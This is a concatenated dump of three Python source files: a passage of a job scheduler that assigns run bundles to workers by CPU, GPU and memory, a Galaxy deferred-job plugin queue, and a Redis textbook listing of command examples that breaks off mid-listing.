os.mkdir(path)
for dependency_path, child_path in deps:
path_util.copy(dependency_path, child_path, follow_symlinks=False)
self._model.update_disk_metadata(bundle, bundle_location, enforce_disk_quota=True)
logger.info('Finished making bundle %s', bundle.uuid)
self._model.update_bundle(bundle, {'state': State.READY})
except Exception as e:
logger.info('Failing bundle %s: %s', bundle.uuid, str(e))
self._model.update_bundle(
bundle, {'state': State.FAILED, 'metadata': {'failure_message': str(e)}}
)
finally:
with self._make_uuids_lock:
self._make_uuids.remove(bundle.uuid)
def _cleanup_dead_workers(self, workers, callback=None):
"""
Clean up workers that we haven't heard from for more than WORKER_TIMEOUT_SECONDS seconds.
Such workers probably died without checking out properly.
"""
for worker in workers.workers():
if datetime.datetime.now() - worker['checkin_time'] > datetime.timedelta(
seconds=WORKER_TIMEOUT_SECONDS
):
logger.info(
'Cleaning up dead worker (%s, %s)', worker['user_id'], worker['worker_id']
)
self._worker_model.worker_cleanup(worker['user_id'], worker['worker_id'])
workers.remove(worker)
if callback is not None:
callback(worker)
def _restage_stuck_starting_bundles(self, workers):
"""
Moves bundles that got stuck in the STARTING state back to the STAGED
state so that they can be scheduled to run again.
"""
for bundle in self._model.batch_get_bundles(state=State.STARTING, bundle_type='run'):
if (
not workers.is_running(bundle.uuid)
or time.time() - bundle.metadata.last_updated > 5 * 60
): # Run message went missing.
logger.info('Re-staging run bundle %s', bundle.uuid)
if self._model.transition_bundle_staged(bundle):
workers.restage(bundle.uuid)
def _acknowledge_recently_finished_bundles(self, workers):
"""
Acknowledge recently finished bundles to workers so they can discard run information.
"""
for bundle in self._model.batch_get_bundles(state=State.FINALIZING, bundle_type='run'):
worker = self._model.get_bundle_worker(bundle.uuid)
if worker is None:
logger.info(
'Bringing bundle offline %s: %s', bundle.uuid, 'No worker claims bundle'
)
self._model.transition_bundle_worker_offline(bundle)
elif self._worker_model.send_json_message(
worker['socket_id'], {'type': 'mark_finalized', 'uuid': bundle.uuid}, 0.2
):
logger.info(
'Acknowledged finalization of run bundle {} on worker {}'.format(
bundle.uuid, worker['worker_id']
)
)
bundle_location = self._bundle_store.get_bundle_location(bundle.uuid)
self._model.transition_bundle_finished(bundle, bundle_location)
def _bring_offline_stuck_running_bundles(self, workers):
"""
Move bundles that got stuck in the RUNNING or PREPARING state into the WORKER_OFFLINE state.
Bundles in WORKER_OFFLINE state can be moved back to the RUNNING or PREPARING state if a
worker resumes the bundle indicating that it's still in one of those states.
"""
active_bundles = self._model.batch_get_bundles(
state=State.RUNNING, bundle_type='run'
) + self._model.batch_get_bundles(state=State.PREPARING, bundle_type='run')
now = time.time()
for bundle in active_bundles:
failure_message = None
if not workers.is_running(bundle.uuid):
failure_message = 'No worker claims bundle'
if now - bundle.metadata.last_updated > WORKER_TIMEOUT_SECONDS:
failure_message = 'Worker offline'
if failure_message is not None:
logger.info('Bringing bundle offline %s: %s', bundle.uuid, failure_message)
self._model.transition_bundle_worker_offline(bundle)
def _schedule_run_bundles_on_workers(self, workers, user_owned):
"""
Schedules STAGED bundles to run on the given workers. If user_owned is
True, then schedules on workers run by the owner of each bundle.
Otherwise, uses CodaLab-owned workers, which have user ID root_user_id.
"""
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='run'):
if user_owned:
workers_list = workers.user_owned_workers(bundle.owner_id)
else:
if not self._model.get_user_parallel_run_quota_left(bundle.owner_id):
logger.info(
"User %s has no parallel run quota left, skipping job for now",
bundle.owner_id,
)
continue # Don't start this bundle yet
workers_list = workers.user_owned_workers(self._model.root_user_id)
workers_list = self._deduct_worker_resources(workers_list)
bundle_resources = self._compute_bundle_resources(bundle)
workers_list = self._filter_and_sort_workers(workers_list, bundle, bundle_resources)
for worker in workers_list:
if self._try_start_bundle(workers, worker, bundle):
break
def _deduct_worker_resources(self, workers_list):
"""
From each worker, subtract resources used by running bundles. Modifies the list.
"""
for worker in workers_list:
for uuid in worker['run_uuids']:
try:
bundle = self._model.get_bundle(uuid)
except NotFoundError:
logger.info(
'Bundle %s in WorkerInfoAccessor but no longer found. Skipping for resource deduction.',
uuid,
)
continue
bundle_resources = self._compute_bundle_resources(bundle)
worker['cpus'] -= bundle_resources.cpus
worker['gpus'] -= bundle_resources.gpus
worker['memory_bytes'] -= bundle_resources.memory
return workers_list
@staticmethod
def _filter_and_sort_workers(workers_list, bundle, bundle_resources):
"""
Filters the workers to those that can run the given bundle and returns
the list sorted in order of preference for running the bundle.
"""
# keep track of which workers have GPUs
has_gpu = {}
for worker in workers_list:
worker_id = worker['worker_id']
has_gpu[worker_id] = worker['gpus'] > 0
# Filter by CPUs.
workers_list = [
worker for worker in workers_list if worker['cpus'] >= bundle_resources.cpus
]
# Filter by GPUs.
if bundle_resources.gpus:
workers_list = [
worker for worker in workers_list if worker['gpus'] >= bundle_resources.gpus
]
# Filter by memory.
workers_list = [
worker for worker in workers_list if worker['memory_bytes'] >= bundle_resources.memory
]
# Filter by tag.
request_queue = bundle.metadata.request_queue
if request_queue:
tagm = re.match('tag=(.+)', request_queue)
if tagm:
workers_list = [worker for worker in workers_list if worker['tag'] == tagm.group(1)]
else:
# We don't know how to handle this type of request queue
# argument.
return []
# Sort workers list according to these keys in the following succession:
# - whether the worker is a CPU-only worker, if the bundle doesn't request GPUs
# - number of dependencies available, descending
# - number of free cpus, descending
# - random key
#
# Breaking ties randomly is important, since multiple workers frequently
# have the same number of dependencies and free CPUs for a given bundle
# (in particular, bundles with no dependencies) and we may end up
# selecting the same worker over and over again for new jobs. While this
# is not a problem for the performance of the jobs themselves, this can
# cause one worker to collect a disproportionate number of dependencies
# in its cache.
needed_deps = set([(dep.parent_uuid, dep.parent_path) for dep in bundle.dependencies])
def get_sort_key(worker):
if worker['shared_file_system']:
num_available_deps = len(needed_deps)
else:
deps = set(worker['dependencies'])
num_available_deps = len(needed_deps & deps)
worker_id = worker['worker_id']
# if the bundle doesn't request GPUs (only request CPUs), prioritize workers that don't have GPUs
gpu_priority = bundle_resources.gpus or not has_gpu[worker_id]
return (gpu_priority, num_available_deps, worker['cpus'], random.random())
workers_list.sort(key=get_sort_key, reverse=True)
return workers_list
def _try_start_bundle(self, workers, worker, bundle):
"""
Tries to start running the bundle on the given worker, returning False
if that failed.
"""
if self._model.transition_bundle_starting(bundle, worker['user_id'], worker['worker_id']):
workers.set_starting(bundle.uuid, worker)
if worker['shared_file_system']:
# On a shared file system we create the path here to avoid NFS
# directory cache issues.
path = self._bundle_store.get_bundle_location(bundle.uuid)
remove_path(path)
os.mkdir(path)
if self._worker_model.send_json_message(
worker['socket_id'], self._construct_run_message(worker, bundle), 0.2
):
logger.info(
'Starting run bundle {} on worker {}'.format(bundle.uuid, worker['worker_id'])
)
return True
else:
self._model.transition_bundle_staged(bundle)
workers.restage(bundle.uuid)
return False
else:
return False
@staticmethod
def _compute_request_cpus(bundle):
"""
Compute the CPU limit used for scheduling the run.
The default of 1 is for backwards compatibility with
runs from before we added client-side defaults.
"""
if not bundle.metadata.request_cpus:
return 1
return bundle.metadata.request_cpus
@staticmethod
def _compute_request_gpus(bundle):
"""
Compute the GPU limit used for scheduling the run.
The default of 0 is for backwards compatibility with
runs from before we added client-side defaults.
"""
if bundle.metadata.request_gpus is None:
return 0
return bundle.metadata.request_gpus
@staticmethod
def _compute_request_memory(bundle):
"""
Compute the memory limit used for scheduling the run.
The default of 2g is for backwards compatibility with
runs from before we added client-side defaults.
"""
if not bundle.metadata.request_memory:
return formatting.parse_size('2g')
return formatting.parse_size(bundle.metadata.request_memory)
def _compute_request_disk(self, bundle):
"""
Compute the disk limit used for scheduling the run.
The default is min(disk quota the user has left, global max)
"""
if not bundle.metadata.request_disk:
return min(
self._model.get_user_disk_quota_left(bundle.owner_id) - 1, self._max_request_disk
)
return formatting.parse_size(bundle.metadata.request_disk)
def _compute_request_time(self, bundle):
"""
Compute the time limit used for scheduling the run.
The default is min(time quota the user has left, global max)
"""
if not bundle.metadata.request_time:
return min(
self._model.get_user_time_quota_left(bundle.owner_id) - 1, self._max_request_time
)
return formatting.parse_duration(bundle.metadata.request_time)
def _get_docker_image(self, bundle):
"""
Set the docker image to the default if not specified.
Unlike other metadata fields, this can actually be None
coming from the client.
Also add the `latest` tag if no tag is specified, to be
consistent with Docker's own behavior.
"""
if not bundle.metadata.request_docker_image:
if bundle.metadata.request_gpus:
docker_image = self._default_gpu_image
else:
docker_image = self._default_cpu_image
else:
docker_image = bundle.metadata.request_docker_image
if ':' not in docker_image:
docker_image += ':latest'
return docker_image
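# For example (hypothetical image names): a request for 'ubuntu' becomes
# 'ubuntu:latest', 'codalab/default-gpu:1.0' is left untouched, and an empty
# request falls back to the configured default CPU or GPU image.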
def _construct_run_message(self, worker, bundle):
"""
Constructs the run message that is sent to the given worker to tell it
to run the given bundle.
"""
message = {}
message['type'] = 'run'
message['bundle'] = bundle_util.bundle_to_bundle_info(self._model, bundle)
if worker['shared_file_system']:
message['bundle']['location'] = self._bundle_store.get_bundle_location(bundle.uuid)
for dependency in message['bundle']['dependencies']:
dependency['location'] = self._bundle_store.get_bundle_location(
dependency['parent_uuid']
)
# Figure out the resource requirements.
bundle_resources = self._compute_bundle_resources(bundle)
message['resources'] = bundle_resources.to_dict()
return message
def _compute_bundle_resources(self, bundle):
return RunResources(
cpus=self._compute_request_cpus(bundle),
gpus=self._compute_request_gpus(bundle),
docker_image=self._get_docker_image(bundle),
time=self._compute_request_time(bundle),
memory=self._compute_request_memory(bundle),
disk=self._compute_request_disk(bundle),
network=bundle.metadata.request_network,
)
def _fail_unresponsive_bundles(self):
"""
Fail bundles in uploading, staged and running state if we haven't heard from them for more than
BUNDLE_TIMEOUT_DAYS days.
"""
bundles_to_fail = (
self._model.batch_get_bundles(state=State.UPLOADING)
+ self._model.batch_get_bundles(state=State.STAGED)
+ self._model.batch_get_bundles(state=State.RUNNING)
)
now = time.time()
for bundle in bundles_to_fail:
# For simplicity, we use field metadata.created to calculate timeout for now.
# Ideally, we should use field metadata.last_updated.
if now - bundle.metadata.created > BUNDLE_TIMEOUT_DAYS * SECONDS_PER_DAY:
failure_message = 'Bundle has been stuck in {} state for more than {} days.'.format(
bundle.state, BUNDLE_TIMEOUT_DAYS
)
logger.info('Failing bundle %s: %s', bundle.uuid, failure_message)
self._model.update_bundle(
bundle,
{'state': State.FAILED, 'metadata': {'failure_message': failure_message}},
)
def _schedule_run_bundles(self):
"""
This method implements a state machine. The states are:
STAGED, no worker_run DB entry:
Ready to send run message to available worker.
STARTING, has worker_run DB entry:
Run message sent, waiting for the run to start.
RUNNING, has worker_run DB entry:
Worker reported that the run has started.
READY / FAILED, no worker_run DB entry:
Finished.
"""
workers = WorkerInfoAccessor(self._worker_model.get_workers())
# Handle some exceptional cases.
self._cleanup_dead_workers(workers)
self._restage_stuck_starting_bundles(workers)
self._bring_offline_stuck_running_bundles(workers)
self._fail_on_too_many_resources()
self._acknowledge_recently_finished_bundles(workers)
# Schedule, preferring user-owned workers.
self._schedule_run_bundles_on_workers(workers, user_owned=True)
self._schedule_run_bundles_on_workers(workers, user_owned=False)
@staticmethod
def _check_resource_failure(
value,
user_fail_string=None,
global_fail_string=None,
user_max=None,
global_max=None,
pretty_print=lambda x: str(x),
):
"""
Returns a failure message in case a certain resource limit is not respected.
If value > user_max, user_fail_string is formatted with value and user_max, in that order.
If value > global_max, global_fail_string is formatted with value and global_max, in that order.
pretty_print is applied to both the value and the max values before they are substituted in.
The format strings should expect string inputs, and pretty_print should convert values to strings.
"""
if value:
if user_max and value > user_max:
return user_fail_string % (pretty_print(value), pretty_print(user_max))
elif global_max and value > global_max:
return global_fail_string % (pretty_print(value), pretty_print(global_max))
return None
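# For example (hypothetical limits): with value=10, user_max=5 and
# user_fail_string='Requested %s but only %s left', this returns the string
# 'Requested 10 but only 5 left'; a value within both limits returns None.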
def _fail_on_too_many_resources(self):
"""
Fails bundles that request more resources than available for the given user.
Note: allow more resources than available on any worker because new
workers might get spun up in response to the presence of this run.
"""
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='run'):
bundle_resources = self._compute_bundle_resources(bundle)
failures = []
failures.append(
self._check_resource_failure(
bundle_resources.disk,
user_fail_string='Requested more disk (%s) than user disk quota left (%s)',
user_max=self._model.get_user_disk_quota_left(bundle.owner_id),
global_fail_string='Maximum job disk size (%s) exceeded (%s)',
global_max=self._max_request_disk,
pretty_print=formatting.size_str,
)
)
failures.append(
self._check_resource_failure(
bundle_resources.time,
user_fail_string='Requested more time (%s) than user time quota left (%s)',
user_max=self._model.get_user_time_quota_left(bundle.owner_id),
global_fail_string='Maximum job time (%s) exceeded (%s)',
global_max=self._max_request_time,
pretty_print=formatting.duration_str,
)
)
failures.append(
self._check_resource_failure(
bundle_resources.memory,
global_fail_string='Requested more memory (%s) than maximum limit (%s)',
global_max=self._max_request_memory,
pretty_print=formatting.size_str,
)
)
failures = [f for f in failures if f is not None]
if len(failures) > 0:
failure_message = '. '.join(failures)
logger.info('Failing %s: %s', bundle.uuid, failure_message)
self._model.update_bundle(
bundle,
{'state': State.FAILED, 'metadata': {'failure_message': failure_message}},
)
|
__init__.py
|
"""
Queue for running deferred code via plugins.
"""
import logging
import os
import threading
from Queue import Queue
from galaxy import model
from galaxy.util.bunch import Bunch
from galaxy.util.sleeper import Sleeper
log = logging.getLogger(__name__)
class DeferredJobQueue(object):
job_states = Bunch(READY='ready',
WAIT='wait',
INVALID='invalid')
def __init__(self, app):
self.app = app
self.sa_session = app.model.context.current
self.queue = Queue()
self.plugins = {}
self._load_plugins()
self.sleeper = Sleeper()
self.running = True
self.waiting_jobs = []
self.__check_jobs_at_startup()
self.monitor_thread = threading.Thread(target=self.__monitor)
self.monitor_thread.start()
log.info('Deferred job queue started')
def _load_plugins(self):
for fname in os.listdir(os.path.dirname(__file__)):
if not fname.startswith('_') and fname.endswith('.py'):
name = fname[:-3]
module_name = 'galaxy.jobs.deferred.' + name
try:
module = __import__(module_name)
except ImportError:
log.exception('Deferred job plugin appears to exist but is not loadable: %s', module_name)
continue
for comp in module_name.split(".")[1:]:
module = getattr(module, comp)
if '__all__' not in dir(module):
log.error('Plugin "%s" does not contain a list of exported classes in __all__' % module_name)
continue
for obj in module.__all__:
display_name = ':'.join((module_name, obj))
plugin = getattr(module, obj)
for name in ('check_job', 'run_job'):
if name not in dir(plugin):
log.error('Plugin "%s" does not contain required method "%s()"' % (display_name, name))
break
else:
self.plugins[obj] = plugin(self.app)
self.plugins[obj].job_states = self.job_states
log.debug('Loaded deferred job plugin: %s' % display_name)
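# A minimal plugin sketch (hypothetical module galaxy/jobs/deferred/example.py):
# a plugin module must list its exported classes in __all__, and each class
# must implement check_job() and run_job(); check_job() returns one of the
# job_states values that the loader attaches to every plugin instance.
#
#     __all__ = ('ExamplePlugin',)
#
#     class ExamplePlugin(object):
#         def __init__(self, app):
#             self.app = app
#         def check_job(self, job):
#             return self.job_states.READY
#         def run_job(self, job):
#             pass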
def __check_jobs_at_startup(self):
waiting_jobs = self.sa_session.query(model.DeferredJob) \
.filter(model.DeferredJob.state == model.DeferredJob.states.WAITING).all()
for job in waiting_jobs:
if not self.__check_job_plugin(job):
continue
if 'check_interval' in dir(self.plugins[job.plugin]):
job.check_interval = self.plugins[job.plugin].check_interval
log.info('Recovered deferred job (id: %s) at startup' % job.id)
# Pass the job ID as opposed to the job, since the monitor thread
# needs to load it in its own threadlocal scoped session.
self.waiting_jobs.append(job.id)
def __monitor(self):
while self.running:
try:
self.__monitor_step()
except Exception:
log.exception('Exception in monitor_step')
self.sleeper.sleep(1)
log.info('job queue stopped')
def __monitor_step(self):
# TODO: Querying the database with this frequency is bad, we need message passing
new_jobs = self.sa_session.query(model.DeferredJob) \
.filter(model.DeferredJob.state == model.DeferredJob.states.NEW).all()
for job in new_jobs:
if not self.__check_job_plugin(job):
continue
job.state = model.DeferredJob.states.WAITING
self.sa_session.add(job)
self.sa_session.flush()
if 'check_interval' in dir(self.plugins[job.plugin]):
job.check_interval = self.plugins[job.plugin].check_interval
self.waiting_jobs.append(job)
new_waiting = []
for job in self.waiting_jobs:
try:
# Recovered jobs are passed in by ID
assert type(job) is int
job = self.sa_session.query(model.DeferredJob).get(job)
except Exception:
pass
if job.is_check_time:
try:
job_state = self.plugins[job.plugin].check_job(job)
except Exception:
self.__fail_job(job)
log.exception('Set deferred job %s to error because of an exception in check_job()' % job.id)
continue
if job_state == self.job_states.READY:
try:
self.plugins[job.plugin].run_job(job)
except Exception:
self.__fail_job(job)
log.exception('Set deferred job %s to error because of an exception in run_job()' % job.id)
continue
elif job_state == self.job_states.INVALID:
self.__fail_job(job)
log.error('Unable to run deferred job (id: %s): Plugin "%s" marked it as invalid' % (job.id, job.plugin))
continue
else:
new_waiting.append(job)
job.last_check = 'now'
else:
new_waiting.append(job)
self.waiting_jobs = new_waiting
def __check_job_plugin(self, job):
if job.plugin not in self.plugins:
log.error('Invalid deferred job plugin: %s' % job.plugin)
job.state = model.DeferredJob.states.ERROR
self.sa_session.add(job)
self.sa_session.flush()
return False
return True
def __check_if_ready_to_run(self, job):
return self.plugins[job.plugin].check_job(job)
def __fail_job(self, job):
job.state = model.DeferredJob.states.ERROR
self.sa_session.add(job)
self.sa_session.flush()
def shutdown(self):
self.running = False
self.sleeper.wake()
class FakeTrans(object):
"""A fake trans for calling the external set metadata tool"""
def __init__(self, app, history=None, user=None):
class Dummy(object):
def __init__(self):
self.id = None
self.app = app
self.sa_session = app.model.context.current
self.dummy = Dummy()
if not history:
self.history = Dummy()
else:
self.history = history
if not user:
self.user = Dummy()
else:
self.user = user
self.model = app.model
def get_galaxy_session(self):
return self.dummy
def log_event(self, message, tool_id=None):
pass
def get_current_user_roles(self):
if self.user:
return self.user.all_roles()
else:
return []
def db_dataset_for(self, dbkey):
if self.history is None:
return None
datasets = self.sa_session.query(self.app.model.HistoryDatasetAssociation) \
.filter_by(deleted=False, history_id=self.history.id, extension="len")
for ds in datasets:
if dbkey == ds.dbkey:
return ds
return None
|
ch03_listing_source.py
|
# -*- coding: utf-8 -*-
import threading
import time
import unittest
import redis
ONE_WEEK_IN_SECONDS = 7 * 86400
VOTE_SCORE = 432
ARTICLES_PER_PAGE = 25
'''
# <start id="string-calls-1"/>
>>> conn = redis.Redis()
>>> conn.get('key') #A
>>> conn.incr('key') #B
1 #B
>>> conn.incr('key', 15) #B
16 #B
>>> conn.decr('key', 5) #C
11 #C
>>> conn.get('key') #D
'11' #D
>>> conn.set('key', '13') #E
True #E
>>> conn.incr('key') #E
14 #E
# <end id="string-calls-1"/>
#A When we fetch a key that does not exist, we get the None value, which is not displayed in the interactive console
#B We can increment keys that don't exist, and we can pass an optional value to increment by more than 1
#C Like incrementing, decrementing takes an optional argument for the amount to decrement by
#D When we fetch the key it acts like a string
#E And when we set the key, we can set it as a string, but still manipulate it like an integer
#END
'''
'''
# <start id="string-calls-2"/>
>>> conn.append('new-string-key', 'hello ') #A
6L #B
>>> conn.append('new-string-key', 'world!')
12L #B
>>> conn.substr('new-string-key', 3, 7) #C
'lo wo' #D
>>> conn.setrange('new-string-key', 0, 'H') #E
12 #F
>>> conn.setrange('new-string-key', 6, 'W')
12
>>> conn.get('new-string-key') #G
'Hello World!' #H
>>> conn.setrange('new-string-key', 11, ', how are you?') #I
25
>>> conn.get('new-string-key')
'Hello World, how are you?' #J
>>> conn.setbit('another-key', 2, 1) #K
0 #L
>>> conn.setbit('another-key', 7, 1) #M
0 #M
>>> conn.get('another-key') #M
'!' #N
# <end id="string-calls-2"/>
#A Let's append the string 'hello ' to the previously non-existent key 'new-string-key'
#B When appending a value, Redis returns the length of the string so far
#C Redis uses 0-indexing, and when accessing ranges, is inclusive of the endpoints by default
#D The string 'lo wo' is from the middle of 'hello world!'
#E Let's set a couple string ranges
#F When setting a range inside a string, Redis also returns the total length of the string
#G Let's see what we have now!
#H Yep, we capitalized our 'H' and 'W'
#I With setrange we can replace anywhere inside the string, and we can make the string longer
#J We replaced the exclamation point and added more to the end of the string
#K If you write to a bit beyond the size of the string, it is filled with nulls
#L Setting bits also returns the value of the bit before it was set
#M If you are going to try to interpret the bits stored in Redis, remember that offsets into bits are from the highest-order to the lowest-order
#N We set bits 2 and 7 to 1, which gave us '!', or character 33
#END
'''
'''
# <start id="list-calls-1"/>
>>> conn.rpush('list-key', 'last') #A
1L #A
>>> conn.lpush('list-key', 'first') #B
2L
>>> conn.rpush('list-key', 'new last')
3L
>>> conn.lrange('list-key', 0, -1) #C
['first', 'last', 'new last'] #C
>>> conn.lpop('list-key') #D
'first' #D
>>> conn.lpop('list-key') #D
'last' #D
>>> conn.lrange('list-key', 0, -1)
['new last']
>>> conn.rpush('list-key', 'a', 'b', 'c') #E
4L
>>> conn.lrange('list-key', 0, -1)
['new last', 'a', 'b', 'c']
>>> conn.ltrim('list-key', 2, -1) #F
True #F
>>> conn.lrange('list-key', 0, -1) #F
['b', 'c'] #F
# <end id="list-calls-1"/>
#A When we push items onto the list, it returns the length of the list after the push has completed
#B We can easily push on both ends of the list
#C Semantically, the left end of the list is the beginning, and the right end of the list is the end
#D Popping off the left items repeatedly will return items from left to right
#E We can push multiple items at the same time
#F We can trim any number of items from the start, end, or both
#END
'''
'''
# <start id="list-calls-2"/>
>>> conn.rpush('list', 'item1') #A
1 #A
>>> conn.rpush('list', 'item2') #A
2 #A
>>> conn.rpush('list2', 'item3') #A
1 #A
>>> conn.brpoplpush('list2', 'list', 1) #B
'item3' #B
>>> conn.brpoplpush('list2', 'list', 1) #C
>>> conn.lrange('list', 0, -1) #D
['item3', 'item1', 'item2'] #D
>>> conn.brpoplpush('list', 'list2', 1)
'item2'
>>> conn.blpop(['list', 'list2'], 1) #E
('list', 'item3') #E
>>> conn.blpop(['list', 'list2'], 1) #E
('list', 'item1') #E
>>> conn.blpop(['list', 'list2'], 1) #E
('list2', 'item2') #E
>>> conn.blpop(['list', 'list2'], 1) #E
>>>
# <end id="list-calls-2"/>
#A Let's add some items to a couple lists to start
#B Let's move an item from one list to the other, which also returns the item that was moved
#C When a list is empty, the blocking pop will stall for the timeout, and return None (which is not displayed in the interactive console)
#D We popped the rightmost item from 'list2' and pushed it to the left of 'list'
#E Blocking left-popping items from these will check lists for items in the order that they are passed, until they are empty
#END
'''
# <start id="exercise-update-token"/>
def update_token(conn, token, user, item=None):
timestamp = time.time()
conn.hset('login:', token, user)
conn.zadd('recent:', token, timestamp)
if item:
key = 'viewed:' + token
conn.lrem(key, item) #A
conn.rpush(key, item) #B
conn.ltrim(key, -25, -1) #C
conn.zincrby('viewed:', item, -1)
# <end id="exercise-update-token"/>
#A Remove the item from the list if it was there
#B Push the item to the right side of the LIST so that ZRANGE and LRANGE have the same result
#C Trim the LIST to only include the most recent 25 items
#END
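# A minimal usage sketch (assuming a local Redis server; the token, user, and
# item names are hypothetical values chosen for illustration):
'''
>>> conn = redis.Redis()
>>> update_token(conn, 'token-abc', 'user27', item='itemX')
>>> conn.lrange('viewed:token-abc', 0, -1)
['itemX']
>>> conn.zscore('viewed:', 'itemX')
-1.0
'''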
'''
# <start id="set-calls-1"/>
>>> conn.sadd('set-key', 'a', 'b', 'c') #A
3 #A
>>> conn.srem('set-key', 'c', 'd') #B
True #B
>>> conn.srem('set-key', 'c', 'd') #B
False #B
>>> conn.scard('set-key') #C
2 #C
>>> conn.smembers('set-key') #D
set(['a', 'b']) #D
>>> conn.smove('set-key', 'set-key2', 'a') #E
True #E
>>> conn.smove('set-key', 'set-key2', 'c') #F
False #F
>>> conn.smembers('set-key2') #F
set(['a']) #F
# <end id="set-calls-1"/>
#A Adding items to the SET returns the number of items that weren't already in the SET
#B Removing items from the SET returns whether an item was removed - note that the client is buggy in that respect, as Redis itself returns the total number of items removed
#C We can get the number of items in the SET
#D We can also fetch the whole SET
#E We can easily move items from one SET to another SET
#F When an item doesn't exist in the first set during a SMOVE, it isn't added to the destination SET
#END
'''
'''
# <start id="set-calls-2"/>
>>> conn.sadd('skey1', 'a', 'b', 'c', 'd') #A
4 #A
>>> conn.sadd('skey2', 'c', 'd', 'e', 'f') #A
4 #A
>>> conn.sdiff('skey1', 'skey2') #B
set(['a', 'b']) #B
>>> conn.sinter('skey1', 'skey2') #C
set(['c', 'd']) #C
>>> conn.sunion('skey1', 'skey2') #D
set(['a', 'c', 'b', 'e', 'd', 'f']) #D
# <end id="set-calls-2"/>
#A First we'll add a few items to a couple SETs
#B We can calculate the result of removing all of the items in the second set from the first SET
#C We can also find out which items exist in both SETs
#D And we can find out all of the items that are in either of the SETs
#END
'''
'''
# <start id="hash-calls-1"/>
>>> conn.hmset('hash-key', {'k1':'v1', 'k2':'v2', 'k3':'v3'}) #A
True #A
>>> conn.hmget('hash-key', ['k2', 'k3']) #B
['v2', 'v3'] #B
>>> conn.hlen('hash-key') #C
3 #C
>>> conn.hdel('hash-key', 'k1', 'k3') #D
True #D
# <end id="hash-calls-1"/>
#A We can add multiple items to the hash in one call
#B We can fetch a subset of the values in a single call
#C The HLEN command is typically used for debugging very large HASHes
#D The HDEL command handles multiple arguments without needing an HMDEL counterpart and returns True if any fields were removed
#END
'''
'''
# <start id="hash-calls-2"/>
>>> conn.hmset('hash-key2', {'short':'hello', 'long':1000*'1'}) #A
True #A
>>> conn.hkeys('hash-key2') #A
['long', 'short'] #A
>>> conn.hexists('hash-key2', 'num') #B
False #B
>>> conn.hincrby('hash-key2', 'num') #C
1L #C
>>> conn.hexists('hash-key2', 'num') #C
True #C
# <end id="hash-calls-2"/>
#A Fetching keys can be useful to keep from needing to transfer large values when you are looking into HASHes
#B We can also check the existence of specific keys
#C Incrementing a previously non-existent key in a hash behaves just like on strings, Redis operates as though the value had been 0
#END
'''
'''
# <start id="zset-calls-1"/>
>>> conn.zadd('zset-key', 'a', 3, 'b', 2, 'c', 1) #A
3 #A
>>> conn.zcard('zset-key') #B
3 #B
>>> conn.zincrby('zset-key', 'c', 3) #C
4.0 #C
>>> conn.zscore('zset-key', 'b') #D
2.0 #D
>>> conn.zrank('zset-key', 'c') #E
2 #E
>>> conn.zcount('zset-key', 0, 3) #F
2L #F
>>> conn.zrem('zset-key', 'b') #G
True #G
>>> conn.zrange('zset-key', 0, -1, withscores=True) #H
[('a', 3.0), ('c', 4.0)] #H
# <end id="zset-calls-1"/>
#A Adding members to ZSETs in Python has the arguments reversed compared to standard Redis, so as to not confuse users compared to HASHes
#B Knowing how large a ZSET is can tell you in some cases if it is necessary to trim your ZSET
#C We can also increment members like we can with STRING and HASH values
#D Fetching scores of individual members can be useful if you have been keeping counters or toplists
#E By fetching the 0-indexed position of a member, we can then later use ZRANGE to fetch a range of the values easily
#F Counting the number of items with a given range of scores can be quite useful for some tasks
#G Removing members is as easy as adding them
#H For debugging, we usually fetch the entire ZSET with this ZRANGE call, but real use-cases will usually fetch items a relatively small group at a time
#END
'''
'''
# <start id="zset-calls-2"/>
>>> conn.zadd('zset-1', 'a', 1, 'b', 2, 'c', 3) #A
3 #A
>>> conn.zadd('zset-2', 'b', 4, 'c', 1, 'd', 0) #A
3 #A
>>> conn.zinterstore('zset-i', ['zset-1', 'zset-2']) #B
2L #B
>>> conn.zrange('zset-i', 0, -1, withscores=True) #B
[('c', 4.0), ('b', 6.0)] #B
>>> conn.zunionstore('zset-u', ['zset-1', 'zset-2'], aggregate='min') #C
4L #C
>>> conn.zrange('zset-u', 0, -1, withscores=True) #C
[('d', 0.0), ('a', 1.0), ('c', 1.0), ('b', 2.0)] #C
>>> conn.sadd('set-1', 'a', 'd') #D
2 #D
>>> conn.zunionstore('zset-u2', ['zset-1', 'zset-2', 'set-1']) #D
4L #D
>>> conn.zrange('zset-u2', 0, -1, withscores=True) #D
[('d', 1.0), ('a', 2.0), ('c', 4.0), ('b', 6.0)] #D
# <end id="zset-calls-2"/>
#A We'll start out by creating a couple ZSETs
#B When performing ZINTERSTORE or ZUNIONSTORE, our default aggregate is sum, so scores of items that are in multiple ZSETs are added
#C It is easy to provide different aggregates, though we are limited to sum, min, and max
#D You can also pass SETs as inputs to ZINTERSTORE and ZUNIONSTORE, they behave as though they were ZSETs with all scores equal to 1
#END
'''
conn = redis.Redis()
def publisher(n):
time.sleep(1)
for i in xrange(n):
conn.publish('channel', i)
time.sleep(1)
def run_pubsub():
threading.Thread(target=publisher, args=(3,)).start()
pubsub = conn.pubsub()
pubsub.subscribe(['channel'])
count = 0
for item in pubsub.listen():
print item
count += 1
if count == 4:
pubsub.unsubscribe()
if count == 5:
break
'''
# <start id="pubsub-calls-1"/>
>>> def publisher(n):
... time.sleep(1) #A
... for i in xrange(n):
... conn.publish('channel', i) #B
... time.sleep(1) #B
...
>>> def run_pubsub():
... threading.Thread(target=publisher, args=(3,)).start() #D
... pubsub = conn.pubsub() #E
... pubsub.subscribe(['channel']) #E
... count = 0
... for item in pubsub.listen(): #F
... print item #G
... count += 1 #H
... if count == 4: #H
... pubsub.unsubscribe() #H
... if count == 5: #L
... break #L
...
>>> run_pubsub() #C
{'pattern': None, 'type': 'subscribe', 'channel': 'channel', 'data': 1L}#I
{'pattern': None, 'type': 'message', 'channel': 'channel', 'data': '0'} #J
{'pattern': None, 'type': 'message', 'channel': 'channel', 'data': '1'} #J
{'pattern': None, 'type': 'message', 'channel': 'channel', 'data': '2'} #J
{'pattern': None, 'type': 'unsubscribe', 'channel': 'channel', 'data': #K
0L} #K
# <end id="pubsub-calls-1"/>
#A We sleep initially in the function to let the SUBSCRIBEr connect and start listening for messages
#B After publishing, we will pause for a moment so that we can see this happen over time
#D Let's start the publisher thread to send 3 messages
#E We'll set up the pubsub object and subscribe to a channel
#F We can listen to subscription messages by iterating over the result of pubsub.listen()
#G We'll print every message that we receive
#H We will stop listening for new messages after the subscribe message and 3 real messages by unsubscribing
#L When we receive the unsubscribe message, we need to stop receiving messages
